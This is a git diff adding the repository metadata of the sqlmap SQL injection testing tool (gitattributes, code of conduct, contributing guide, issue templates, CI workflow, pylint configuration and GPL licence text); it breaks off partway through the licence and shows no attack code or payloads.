diff --git a/src/sqlmap-master/.gitattributes b/src/sqlmap-master/.gitattributes new file mode 100644 index 0000000..a99321d --- /dev/null +++ b/src/sqlmap-master/.gitattributes @@ -0,0 +1,27 @@ +*.conf text eol=lf +*.json text eol=lf +*.html text eol=lf +*.md text eol=lf +*.md5 text eol=lf +*.pl text eol=lf +*.py text eol=lf +*.sh text eol=lf +*.sql text eol=lf +*.txt text eol=lf +*.xml text eol=lf +*.yaml text eol=lf +*.yml text eol=lf +LICENSE text eol=lf +COMMITMENT text eol=lf + +*_ binary +*.dll binary +*.pdf binary +*.so binary +*.wav binary +*.zip binary +*.x32 binary +*.x64 binary +*.exe binary +*.sln binary +*.vcproj binary diff --git a/src/sqlmap-master/.github/CODE_OF_CONDUCT.md b/src/sqlmap-master/.github/CODE_OF_CONDUCT.md new file mode 100644 index 0000000..2a36bad --- /dev/null +++ b/src/sqlmap-master/.github/CODE_OF_CONDUCT.md @@ -0,0 +1,46 @@ +# Contributor Covenant Code of Conduct + +## Our Pledge + +In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. + +## Our Standards + +Examples of behavior that contributes to creating a positive environment include: + +* Using welcoming and inclusive language +* Being respectful of differing viewpoints and experiences +* Gracefully accepting constructive criticism +* Focusing on what is best for the community +* Showing empathy towards other community members + +Examples of unacceptable behavior by participants include: + +* The use of sexualized language or imagery and unwelcome sexual attention or advances +* Trolling, insulting/derogatory comments, and personal or political attacks +* Public or private harassment +* Publishing others' private information, such as a physical or electronic address, without explicit permission +* Other conduct which could reasonably be considered inappropriate in a professional setting + +## Our Responsibilities + +Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. + +Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. + +## Scope + +This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. + +## Enforcement + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. + +Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. + +## Attribution + +This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] + +[homepage]: http://contributor-covenant.org +[version]: http://contributor-covenant.org/version/1/4/ diff --git a/src/sqlmap-master/.github/CONTRIBUTING.md b/src/sqlmap-master/.github/CONTRIBUTING.md new file mode 100644 index 0000000..2ae8068 --- /dev/null +++ b/src/sqlmap-master/.github/CONTRIBUTING.md @@ -0,0 +1,36 @@ +# Contributing to sqlmap + +## Reporting bugs + +**Bug reports are welcome**! +Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). + +### Guidelines + +* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. +* Make sure you can reproduce the bug with the latest development version of sqlmap. +* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. +* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* + +## Submitting code changes + +All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). + +Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). +Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! + +### Guidelines + +In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: + +* Each patch should make one logical change. +* Avoid tabbing, use four blank spaces instead. +* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org). +* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. +* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. +* Style that is too different from main branch will be ''adapted'' by the developers side. +* Do not touch anything inside `thirdparty/` and `extra/` folders. + +### Licensing + +By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/src/sqlmap-master/.github/FUNDING.yml b/src/sqlmap-master/.github/FUNDING.yml new file mode 100644 index 0000000..e6b2999 --- /dev/null +++ b/src/sqlmap-master/.github/FUNDING.yml @@ -0,0 +1 @@ +github: sqlmapproject diff --git a/src/sqlmap-master/.github/ISSUE_TEMPLATE/bug_report.md b/src/sqlmap-master/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 0000000..0a2d0fe --- /dev/null +++ b/src/sqlmap-master/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,37 @@ +--- +name: Bug report +about: Create a report to help us improve +title: '' +labels: bug report +assignees: '' + +--- + +**Describe the bug** +A clear and concise description of what the bug is. + +**To Reproduce** +1. Run '...' +2. See error + +**Expected behavior** +A clear and concise description of what you expected to happen. + +**Screenshots** +If applicable, add screenshots to help explain your problem. + +**Running environment:** + - sqlmap version [e.g. 1.7.2.12#dev] + - Installation method [e.g. pip] + - Operating system: [e.g. Microsoft Windows 11] + - Python version [e.g. 3.11.2] + +**Target details:** + - DBMS [e.g. Microsoft SQL Server] + - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind] + - WAF/IPS [if any] + - Relevant console output [if any] + - Exception traceback [if any] + +**Additional context** +Add any other context about the problem here. diff --git a/src/sqlmap-master/.github/ISSUE_TEMPLATE/feature_request.md b/src/sqlmap-master/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 0000000..e301d68 --- /dev/null +++ b/src/sqlmap-master/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,20 @@ +--- +name: Feature request +about: Suggest an idea for this project +title: '' +labels: feature request +assignees: '' + +--- + +**Is your feature request related to a problem? Please describe.** +A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] + +**Describe the solution you'd like** +A clear and concise description of what you want to happen. + +**Describe alternatives you've considered** +A clear and concise description of any alternative solutions or features you've considered. + +**Additional context** +Add any other context or screenshots about the feature request here. diff --git a/src/sqlmap-master/.github/workflows/tests.yml b/src/sqlmap-master/.github/workflows/tests.yml new file mode 100644 index 0000000..802ff8a --- /dev/null +++ b/src/sqlmap-master/.github/workflows/tests.yml @@ -0,0 +1,28 @@ +on: + push: + branches: [ master ] + pull_request: + branches: [ master ] + +jobs: + build: + runs-on: ${{ matrix.os }} + strategy: + matrix: + os: [ubuntu-latest, macos-latest, windows-latest] + python-version: [ 'pypy-2.7', '3.12' ] + exclude: + - os: macos-latest + python-version: 'pypy-2.7' + steps: + - uses: actions/checkout@v2 + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: ${{ matrix.python-version }} + - name: Basic import test + run: python -c "import sqlmap; import sqlmapapi" + - name: Smoke test + run: python sqlmap.py --smoke + - name: Vuln test + run: python sqlmap.py --vuln diff --git a/src/sqlmap-master/.gitignore b/src/sqlmap-master/.gitignore new file mode 100644 index 0000000..1f7f94a --- /dev/null +++ b/src/sqlmap-master/.gitignore @@ -0,0 +1,8 @@ +output/ +__pycache__/ +*.py[cod] +.sqlmap_history +traffic.txt +*~ +req*.txt +.idea/ \ No newline at end of file diff --git a/src/sqlmap-master/.pylintrc b/src/sqlmap-master/.pylintrc new file mode 100644 index 0000000..631dcdd --- /dev/null +++ b/src/sqlmap-master/.pylintrc @@ -0,0 +1,546 @@ +# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker + +[MASTER] + +# Specify a configuration file. +#rcfile= + +# Python code to execute, usually for sys.path manipulation such as +# pygtk.require(). +init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))" + +# Add files or directories to the blacklist. They should be base names, not +# paths. +ignore= + +# Pickle collected data for later comparisons. +persistent=no + +# List of plugins (as comma separated values of python modules names) to load, +# usually to register additional checkers. +load-plugins= + +# Use multiple processes to speed up Pylint. +# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!! +jobs=1 + +# Allow loading of arbitrary C extensions. Extensions are imported into the +# active Python interpreter and may run arbitrary code. +unsafe-load-any-extension=no + +# A comma-separated list of package or module names from where C extensions may +# be loaded. Extensions are loading into the active Python interpreter and may +# run arbitrary code +extension-pkg-whitelist= + +# Allow optimization of some AST trees. This will activate a peephole AST +# optimizer, which will apply various small optimizations. For instance, it can +# be used to obtain the result of joining multiple strings with the addition +# operator. Joining a lot of strings can lead to a maximum recursion error in +# Pylint and this flag can prevent that. It has one side effect, the resulting +# AST will be different than the one from reality. +optimize-ast=no + + +[MESSAGES CONTROL] + +# Only show warnings with the listed confidence levels. Leave empty to show +# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED +confidence= + +# Enable the message, report, category or checker with the given id(s). You can +# either give multiple identifier separated by comma (,) or put this option +# multiple time. See also the "--disable" option for examples. +disable=all + +enable=import-error, + import-self, + reimported, + wildcard-import, + misplaced-future, + deprecated-module, + unpacking-non-sequence, + invalid-all-object, + undefined-all-variable, + used-before-assignment, + cell-var-from-loop, + global-variable-undefined, + redefine-in-handler, + unused-import, + unused-wildcard-import, + global-variable-not-assigned, + undefined-loop-variable, + global-at-module-level, + bad-open-mode, + redundant-unittest-assert, + boolean-datetime + deprecated-method, + anomalous-unicode-escape-in-string, + anomalous-backslash-in-string, + not-in-loop, + continue-in-finally, + abstract-class-instantiated, + star-needs-assignment-target, + duplicate-argument-name, + return-in-init, + too-many-star-expressions, + nonlocal-and-global, + return-outside-function, + return-arg-in-generator, + invalid-star-assignment-target, + bad-reversed-sequence, + nonexistent-operator, + yield-outside-function, + init-is-generator, + nonlocal-without-binding, + lost-exception, + assert-on-tuple, + dangerous-default-value, + duplicate-key, + useless-else-on-loop + expression-not-assigned, + confusing-with-statement, + unnecessary-lambda, + pointless-statement, + pointless-string-statement, + unnecessary-pass, + unreachable, + using-constant-test, + bad-super-call, + missing-super-argument, + slots-on-old-class, + super-on-old-class, + property-on-old-class, + not-an-iterable, + not-a-mapping, + format-needs-mapping, + truncated-format-string, + missing-format-string-key, + mixed-format-string, + too-few-format-args, + bad-str-strip-call, + too-many-format-args, + bad-format-character, + format-combined-specification, + bad-format-string-key, + bad-format-string, + missing-format-attribute, + missing-format-argument-key, + unused-format-string-argument + unused-format-string-key, + invalid-format-index, + bad-indentation, + mixed-indentation, + unnecessary-semicolon, + lowercase-l-suffix, + invalid-encoded-data, + unpacking-in-except, + import-star-module-level, + long-suffix, + old-octal-literal, + old-ne-operator, + backtick, + old-raise-syntax, + metaclass-assignment, + next-method-called, + dict-iter-method, + dict-view-method, + indexing-exception, + raising-string, + using-cmp-argument, + cmp-method, + coerce-method, + delslice-method, + getslice-method, + hex-method, + nonzero-method, + t-method, + setslice-method, + old-division, + logging-format-truncated, + logging-too-few-args, + logging-too-many-args, + logging-unsupported-format, + logging-format-interpolation, + invalid-unary-operand-type, + unsupported-binary-operation, + not-callable, + redundant-keyword-arg, + assignment-from-no-return, + assignment-from-none, + not-context-manager, + repeated-keyword, + missing-kwoa, + no-value-for-parameter, + invalid-sequence-index, + invalid-slice-index, + unexpected-keyword-arg, + unsupported-membership-test, + unsubscriptable-object, + access-member-before-definition, + method-hidden, + assigning-non-slot, + duplicate-bases, + inconsistent-mro, + inherit-non-class, + invalid-slots, + invalid-slots-object, + no-method-argument, + no-self-argument, + unexpected-special-method-signature, + non-iterator-returned, + arguments-differ, + signature-differs, + bad-staticmethod-argument, + non-parent-init-called, + bad-except-order, + catching-non-exception, + bad-exception-context, + notimplemented-raised, + raising-bad-type, + raising-non-exception, + misplaced-bare-raise, + duplicate-except, + nonstandard-exception, + binary-op-exception, + not-async-context-manager, + yield-inside-async-function + +# Needs investigation: +# abstract-method (might be indicating a bug? probably not though) +# protected-access (requires some refactoring) +# attribute-defined-outside-init (requires some refactoring) +# super-init-not-called (requires some cleanup) + +# Things we'd like to enable someday: +# redefined-builtin (requires a bunch of work to clean up our code first) +# redefined-outer-name (requires a bunch of work to clean up our code first) +# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760) +# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73) +# unused-argument (need to clean up or code a lot, e.g. prefix unused_?) +# function-redefined (@overload causes lots of spurious warnings) +# too-many-function-args (@overload causes spurious warnings... I think) +# parameter-unpacking (needed for eventual Python 3 compat) +# print-statement (needed for eventual Python 3 compat) +# filter-builtin-not-iterating (Python 3) +# map-builtin-not-iterating (Python 3) +# range-builtin-not-iterating (Python 3) +# zip-builtin-not-iterating (Python 3) +# many others relevant to Python 3 +# unused-variable (a little work to cleanup, is all) + +# ... +[REPORTS] + +# Set the output format. Available formats are text, parseable, colorized, msvs +# (visual studio) and html. You can also give a reporter class, eg +# mypackage.mymodule.MyReporterClass. +output-format=parseable + +# Put messages in a separate file for each module / package specified on the +# command line instead of printing them on stdout. Reports (if any) will be +# written in a file name "pylint_global.[txt|html]". +files-output=no + +# Tells whether to display a full report or only the messages +reports=no + +# Python expression which should return a note less than 10 (10 is the highest +# note). You have access to the variables errors warning, statement which +# respectively contain the number of errors / warnings messages and the total +# number of statements analyzed. This is used by the global evaluation report +# (RP0004). +evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10) + +# Template used to display messages. This is a python new-style format string +# used to format the message information. See doc for all details +#msg-template= + + +[LOGGING] + +# Logging modules to check that the string format arguments are in logging +# function parameter format +logging-modules=logging + + +[FORMAT] + +# Maximum number of characters on a single line. +max-line-length=100 + +# Regexp for a line that is allowed to be longer than the limit. +ignore-long-lines=^\s*(# )??$ + +# Allow the body of an if to be on the same line as the test if there is no +# else. +single-line-if-stmt=no + +# List of optional constructs for which whitespace checking is disabled. `dict- +# separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}. +# `trailing-comma` allows a space between comma and closing bracket: (a, ). +# `empty-line` allows space-only lines. +no-space-check=trailing-comma,dict-separator + +# Maximum number of lines in a module +max-module-lines=1000 + +# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1 +# tab). +indent-string=' ' + +# Number of spaces of indent required inside a hanging or continued line. +indent-after-paren=4 + +# Expected format of line ending, e.g. empty (any line ending), LF or CRLF. +expected-line-ending-format= + + +[TYPECHECK] + +# Tells whether missing members accessed in mixin class should be ignored. A +# mixin class is detected if its name ends with "mixin" (case insensitive). +ignore-mixin-members=yes + +# List of module names for which member attributes should not be checked +# (useful for modules/projects where namespaces are manipulated during runtime +# and thus existing member attributes cannot be deduced by static analysis. It +# supports qualified module names, as well as Unix pattern matching. +ignored-modules=thirdparty.six.moves + +# List of classes names for which member attributes should not be checked +# (useful for classes with attributes dynamically set). This supports can work +# with qualified names. +ignored-classes= + +# List of members which are set dynamically and missed by pylint inference +# system, and so shouldn't trigger E1101 when accessed. Python regular +# expressions are accepted. +generated-members= + + +[VARIABLES] + +# Tells whether we should check for unused import in __init__ files. +init-import=no + +# A regular expression matching the name of dummy variables (i.e. expectedly +# not used). +dummy-variables-rgx=_$|dummy + +# List of additional names supposed to be defined in builtins. Remember that +# you should avoid to define new builtins when possible. +additional-builtins= + +# List of strings which can identify a callback function by name. A callback +# name must start or end with one of those strings. +callbacks=cb_,_cb + + +[SIMILARITIES] + +# Minimum lines number of a similarity. +min-similarity-lines=4 + +# Ignore comments when computing similarities. +ignore-comments=yes + +# Ignore docstrings when computing similarities. +ignore-docstrings=yes + +# Ignore imports when computing similarities. +ignore-imports=no + + +[SPELLING] + +# Spelling dictionary name. Available dictionaries: none. To make it working +# install python-enchant package. +spelling-dict= + +# List of comma separated words that should not be checked. +spelling-ignore-words= + +# A path to a file that contains private dictionary; one word per line. +spelling-private-dict-file= + +# Tells whether to store unknown words to indicated private dictionary in +# --spelling-private-dict-file option instead of raising a message. +spelling-store-unknown-words=no + + +[MISCELLANEOUS] + +# List of note tags to take in consideration, separated by a comma. +notes=FIXME,XXX,TODO + + +[BASIC] + +# List of builtins function names that should not be used, separated by a comma +bad-functions=map,filter,input + +# Good variable names which should always be accepted, separated by a comma +good-names=i,j,k,ex,Run,_ + +# Bad variable names which should always be refused, separated by a comma +bad-names=foo,bar,baz,toto,tutu,tata + +# Colon-delimited sets of names that determine each other's naming style when +# the name regexes allow several styles. +name-group= + +# Include a hint for the correct naming format with invalid-name +include-naming-hint=no + +# Regular expression matching correct function names +function-rgx=[a-z_][a-z0-9_]{2,30}$ + +# Naming hint for function names +function-name-hint=[a-z_][a-z0-9_]{2,30}$ + +# Regular expression matching correct variable names +variable-rgx=[a-z_][a-z0-9_]{2,30}$ + +# Naming hint for variable names +variable-name-hint=[a-z_][a-z0-9_]{2,30}$ + +# Regular expression matching correct constant names +const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$ + +# Naming hint for constant names +const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$ + +# Regular expression matching correct attribute names +attr-rgx=[a-z_][a-z0-9_]{2,30}$ + +# Naming hint for attribute names +attr-name-hint=[a-z_][a-z0-9_]{2,30}$ + +# Regular expression matching correct argument names +argument-rgx=[a-z_][a-z0-9_]{2,30}$ + +# Naming hint for argument names +argument-name-hint=[a-z_][a-z0-9_]{2,30}$ + +# Regular expression matching correct class attribute names +class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ + +# Naming hint for class attribute names +class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$ + +# Regular expression matching correct inline iteration names +inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$ + +# Naming hint for inline iteration names +inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$ + +# Regular expression matching correct class names +class-rgx=[A-Z_][a-zA-Z0-9]+$ + +# Naming hint for class names +class-name-hint=[A-Z_][a-zA-Z0-9]+$ + +# Regular expression matching correct module names +module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ + +# Naming hint for module names +module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$ + +# Regular expression matching correct method names +method-rgx=[a-z_][a-z0-9_]{2,30}$ + +# Naming hint for method names +method-name-hint=[a-z_][a-z0-9_]{2,30}$ + +# Regular expression which should only match function or class names that do +# not require a docstring. +no-docstring-rgx=^_ + +# Minimum line length for functions/classes that require docstrings, shorter +# ones are exempt. +docstring-min-length=-1 + + +[ELIF] + +# Maximum number of nested blocks for function / method body +max-nested-blocks=5 + + +[IMPORTS] + +# Deprecated modules which should not be used, separated by a comma +deprecated-modules=regsub,TERMIOS,Bastion,rexec + +# Create a graph of every (i.e. internal and external) dependencies in the +# given file (report RP0402 must not be disabled) +import-graph= + +# Create a graph of external dependencies in the given file (report RP0402 must +# not be disabled) +ext-import-graph= + +# Create a graph of internal dependencies in the given file (report RP0402 must +# not be disabled) +int-import-graph= + + +[DESIGN] + +# Maximum number of arguments for function / method +max-args=5 + +# Argument names that match this expression will be ignored. Default to name +# with leading underscore +ignored-argument-names=_.* + +# Maximum number of locals for function / method body +max-locals=15 + +# Maximum number of return / yield for function / method body +max-returns=6 + +# Maximum number of branch for function / method body +max-branches=12 + +# Maximum number of statements in function / method body +max-statements=50 + +# Maximum number of parents for a class (see R0901). +max-parents=7 + +# Maximum number of attributes for a class (see R0902). +max-attributes=7 + +# Minimum number of public methods for a class (see R0903). +min-public-methods=2 + +# Maximum number of public methods for a class (see R0904). +max-public-methods=20 + +# Maximum number of boolean expressions in a if statement +max-bool-expr=5 + + +[CLASSES] + +# List of method names used to declare (i.e. assign) instance attributes. +defining-attr-methods=__init__,__new__,setUp + +# List of valid names for the first argument in a class method. +valid-classmethod-first-arg=cls + +# List of valid names for the first argument in a metaclass class method. +valid-metaclass-classmethod-first-arg=mcs + +# List of member names, which should be excluded from the protected access +# warning. +exclude-protected=_asdict,_fields,_replace,_source,_make + + +[EXCEPTIONS] + +# Exceptions that will emit a warning when being caught. Defaults to +# "Exception" +overgeneral-exceptions=Exception diff --git a/src/sqlmap-master/LICENSE b/src/sqlmap-master/LICENSE new file mode 100644 index 0000000..894e0ec --- /dev/null +++ b/src/sqlmap-master/LICENSE @@ -0,0 +1,348 @@ +COPYING -- Describes the terms under which sqlmap is distributed. A copy +of the GNU General Public License (GPL) is appended to this file. + +sqlmap is (C) 2006-2024 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. + +This program is free software; you may redistribute and/or modify it under +the terms of the GNU General Public License as published by the Free +Software Foundation; Version 2 (or later) with the clarifications and +exceptions described below. This guarantees your right to use, modify, and +redistribute this software under certain conditions. If you wish to embed +sqlmap technology into proprietary software, we sell alternative licenses +(contact sales@sqlmap.org). + +Note that the GPL places important restrictions on "derived works", yet it +does not provide a detailed definition of that term. To avoid +misunderstandings, we interpret that term as broadly as copyright law +allows. For example, we consider an application to constitute a "derived +work" for the purpose of this license if it does any of the following: +* Integrates source code from sqlmap. +* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml +* Executes sqlmap and parses the results (as opposed to typical shell or + execution-menu apps, which simply display raw sqlmap output and so are + not derivative works). +* Integrates/includes/aggregates sqlmap into a proprietary executable + installer, such as those produced by InstallShield. +* Links to a library or executes a program that does any of the above + +The term "sqlmap" should be taken to also include any portions or derived +works of sqlmap. This list is not exclusive, but is meant to clarify our +interpretation of derived works with some common examples. Our +interpretation applies only to sqlmap - we do not speak for other people's +GPL works. + +This license does not apply to the third-party components. More details can +be found inside the file 'doc/THIRD-PARTY.md'. + +If you have any questions about the GPL licensing restrictions on using +sqlmap in non-GPL works, we would be happy to help. As mentioned above, +we also offer alternative license to integrate sqlmap into proprietary +applications and appliances. + +If you received these files with a written license agreement or contract +stating terms other than the terms above, then that alternative license +agreement takes precedence over these comments. + +Source is provided to this software because we believe users have a right +to know exactly what a program is going to do before they run it. + +Source code also allows you to fix bugs and add new features. You are +highly encouraged to send your changes to dev@sqlmap.org for possible +incorporation into the main distribution. By sending these changes to the +sqlmap developers or via Git pull request, checking them into the sqlmap +source code repository, it is understood (unless you specify otherwise) +that you are offering the sqlmap project the unlimited, non-exclusive +right to reuse, modify, and relicense the code. sqlmap will always be +available Open Source, but this is important because the inability to +relicense code has caused devastating problems for other Free Software +projects (such as KDE and NASM). If you wish to specify special license +conditions of your contributions, just say so when you send them. + +This program is distributed in the hope that it will be useful, but +WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +General Public License v2.0 for more details at +http://www.gnu.org/licenses/gpl-2.0.html, or below + +**************************************************************************** + + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your 